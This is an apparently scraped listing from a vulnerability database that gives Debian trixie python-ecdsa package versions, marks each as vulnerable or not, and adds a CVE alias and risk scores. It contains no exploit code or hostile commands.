resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.16.1-1%3Fdistro=trixie

url pkg:deb/debian/python-ecdsa@0.18.0-3?distro=trixie

purl pkg:deb/debian/python-ecdsa@0.18.0-3?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-kbjk-tnfz-rfdw

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.18.0-3%3Fdistro=trixie

url pkg:deb/debian/python-ecdsa@0.19.1-1?distro=trixie

purl pkg:deb/debian/python-ecdsa@0.19.1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-kbjk-tnfz-rfdw

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.19.1-1%3Fdistro=trixie

url	pkg:deb/debian/python-ecdsa@0.19.2-1?distro=trixie
purl	pkg:deb/debian/python-ecdsa@0.19.2-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.19.2-1%3Fdistro=trixie

aliases CVE-2019-14853, GHSA-2mrj-435v-c2cr, GHSA-pwfw-mgfj-7g3g, PYSEC-2019-177

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qrf7-gnjg-bfat

Risk_score 3.1

Resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.19.1-1%3Fdistro=trixie

Package Instance